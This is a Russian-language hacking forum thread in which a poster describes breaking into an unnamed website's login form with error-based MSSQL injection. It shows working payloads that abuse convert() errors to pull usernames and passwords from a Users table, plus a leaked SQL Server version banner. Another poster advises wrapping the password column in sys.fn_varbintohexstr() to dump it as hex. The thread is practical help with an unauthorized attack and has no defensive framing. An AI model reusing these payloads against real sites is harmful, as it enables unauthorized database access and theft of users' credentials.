Привет, у меня проблема с mssql инйэкцию. Я в один сайт нашол "vulnerable" (ньезнаю как ето сказать по руски) логин форму. Я палучил юзернеими и другую информацию от датабази с такие команди:
' and 1=convert(int, (select top 1...))--
Когда я хачу палучиц парольи с такую методу я палучаю такие парольи - ÅÆÅÆ .
' and 1=convert(varchar, (select top 1 Password from Users where Username='foundusername'))--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'ª·¨©»¯ ' to a column of data type int.
Парольи можно быть в арабиц енкодинг, я попробовал поменьять бровсер енкодинг и без прогреса. Спасибо.
P.S. Я неоченъ харашо гаварю по руски, извиньице.

вообще если даже в арабской кодировке пароли то они должны нормально отображаться в браузере
это у всех юзеров так пароли выглядят?

дa

вообще если даже в арабской кодировке пароли то они должны нормально отображаться в браузере
это у всех юзеров так пароли выглядят?
Кстати часто очень бывает что абра кадабра вылазиет.
Тот же эллементарный 1' or 1=@@version.
Вроде слов много вылазиет, но абра кадабра.
Может знаешь что в чём проблема? :confused:

Microsoft SQL Server 2000 -

8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.2

(Build 3790: Service Pack 1)

select+top+1+sys.fn_varbintohexstr(password)+from+ Users+where+Username="foundusername"

юзай так, тобишь функцию sys.fn_varbintohexstr().